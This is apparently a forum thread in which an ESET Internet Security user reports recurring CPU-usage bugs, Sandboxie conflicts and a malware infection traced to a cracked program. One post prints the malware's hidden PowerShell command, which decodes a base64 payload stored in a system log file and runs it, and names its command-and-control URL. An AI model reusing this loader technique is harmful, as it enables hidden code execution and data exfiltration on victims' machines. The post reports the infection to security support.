Kevin999

Bitcomet utilize too much CPU (about 1 CPU core, i.e ~25%) is a known issue caused by BitComet's UDP transmission thread (BT DHT network (and maybe uTP)), but egui.exe sometimes also utilize ~25% on my computer (Intel Core i5-4690, 4 cores). Egui,exe CPU usage bug reproduce today, it happens when keeping at Network Connection page, I'll send you the log later.

This bug reproduce today, I'll send you the log. @Marcos

If I set refresh interval = 5s, egui.exe CPU usage will suddenly grow up per 5 second.

I think a potential problem is: Network connection page have lots of connection information item, because I running eMule and BitComet to share files, they will create mass TCP and UDP session, so egui.exe needs to update connection information frequently, thus consuming too much CPU.

Especially at Network Connection page. If I exit at this page, egui.exe will still consuming CPU after main window close. ESET Internet Security 16.1.14.0 By the way, egui,exe should be terminate after main window close.

I try to recovery the SyncAppvPublishingServer.vbs from EIS' quarantine, and I will sent it to you later. @Marcos

The same virus. It seems caused by a UltraEdit cracker.

Unfortunately, real-time performance exclusion for whole directory and exclusion for sandboxie .exe in Eset Deep Behavior Inspection seems doesn't work, this bug reprocedure yesterday.

This bug reproduce today, ekrn.exe cost>=50 CPU, and sandboxie couldn't delete contents, Unfortunately, after I try to unmount RAMDisk, this bug doesn't disappear, but it disappear after reboot.

Here's some discussions of Sandboxie users about CPU usage, sandboxie and ESET: https://github.com/sandboxie-plus/Sandboxie/issues/1502

This bug reproduce today, ekrn.exe cost>=50 CPU, and sandboxie couldn't delete contents, but after I try to unmount RAMDisk, this bug disappear immediately. The sandboxie work folder is storage in RAMDisk.

This bug reproduce today. It also disappear after restart my computer. Except ekrn.exe cost ≥50% CPU, sandboxed firefox crash; becuse the unsandboxed firefox have been run for some time, so it works well. Edge could launch, but it no response after a while.

This bug reproduce today, but after I delete sandbox contains, this bug disappear. I guess sandboxie maybe conflict with EIS?

This bug reproduce today. It also disappear after restart my computer. Except ekrn.exe cost >=50% CPU, Edge and IE couldn't open any website (always keep loading), although Firefox have been run for some time, it also couldn't open any website, only IE could start again after exit. These web browsers all have processes after exit, and they couldn't terminated by task manager (acces denied). Besides, ping works well.

This bug reproduce today. It also disappear after restart my computer. Except ekrn.exe cost >=50% CPU, Edge and IE couldn't open any website (always keep loading), because Firefox have been run for some time, so it works well, only IE could start again after exit. These web browsers all have processes after exit, and they couldn't terminated by task manager (acces denied). Besides, ping works well.

How about only disable PS Remoting capability (especially incoming package) by EIS firewall by default? Beacuse most user maybe don't know how to use powershell. https://4sysops.com/wiki/disable-powershell-remoting-disable-psremoting-winrm-listener-firewall-and-localaccounttokenfilterpolicy/#disable-the-firewall-exceptions Besides, I think Windows Remote Management is less used by home user, EIS firewall could also block it by default to provide higher security.

I think ESET internet protection could block Windows Remote Management (WS-Management) by default (especially incoming package), and add an option to allow it manually.

What should I do? My computer has been install VMware Workstation 16 Pro (16.2.3 build-19376536).

The threat was detected at 25 14:42:11 and 26 06:24:28 (after system start), but it no longer detected after that.

I also use ESET SysInspector to capture a snapshot, I can upload it if in need.

Yesterday, I found some strange internet traffic when I using Wireshark. Then, I use EIS "network connection" tool, found it was created by powershell (I didn't run any powershell). This issue reproduce today. Conhost.exe and powershell.exe was running background, but I didn't run each of them. Powershell connected to [2606:4700:3031::ac43:9c07]:80 (today the same as yesterday), conhost seems doesn't had any network activity. I use Wireshark to capture packages. then use filter ipv6.addr==2606:4700:3031::ac43:9c07 , then I found it was using HTTP/1.1 with connect method. Please note the strange strings in X-User-Agent. By the way, TLS (TCP-443) and QUIC (UDP-443) was created when I used Sandboxed Firefox visit xttps://private-chatting.com/ and xttps://api.private-chatting.com/ (!!! BE CAREFUL to visit them !!!), these website is using Cloudflare to protect themselves. I use ESET SysInspector to captured a snapshot. I used nslookup to reslove: C:\Users\Admin>nslookup 2606:4700:3031::ac43:9c07 DNS request timed out. timeout was 2 seconds. 服务器: UnKnown Address: 192.168.1.1 DNS request timed out. timeout was 2 seconds. *** 请求 UnKnown 超时 C:\Users\Admin>nslookup api.private-chatting.com DNS request timed out. timeout was 2 seconds. 服务器: UnKnown Address: 192.168.1.1 非权威应答: 名称: api.private-chatting.com Addresses: 2606:4700:3032::6815:38d6 2606:4700:3031::ac43:9c07 104.21.56.214 __Today__ I find the command line parameter of one of the powershell.exe by taskmgr (it cost about 10% CPU): "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer n; $a=Get-Content C:\Windows\logs\system-logs.txt | Select -Index 17033;$script_decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($a)); $script_block = [Scriptblock]::Create($script_decoded);Invoke-Command $script_block} 2. Find C:\Windows\logs\system-logs.txt , find these strings Snipped: The code was moved to the the attached file to squeeze the post. Please note $EndPointURL = "hxxp://api.private-chatting.com/connect"; It's as same as the URL in pcapng file. system-logs.txt Strange traffic_20220424.rar system-logs.rar

Now I using Windows 10 Enterprise LTSC 2022 x64 (21H2). This bug even happened when I was using Windows 10 Enterprise LTSC 2019 x64 (1809), my Windows was clean upgrade (delete system partition, EFI system partition and recovery partition), so I can confirm I have been tried a complete clean install of ESET.

This bug reproduce today. It also disappear after restart my computer. Except ekrn.exe cost >=50% CPU, Edge and IE couldn't open any website (always keeping loading) and Edge no response after a moment. Firefox has been run for some time, and it's normal.

This bug reproduce today. It also disappear after restart my computer. Except ekrn.exe cost >=50% CPU, IE couldn't open any website (always keeping loading), Firefox and Edge couldn't launch (has processes). I will send you the dump later. By the way, I use ESET Log Collecter after restart computer though the dump was created first.

This bug reproduce today. It also disappear after restart my computer. Except ekrn.exe cost >=50% CPU, IE and Edge couldn't open any website (always keeping loading), Firefox is OK. I will send you the dump later. By the way, I use ESET Log Collecter after restart computer though the dump was created first.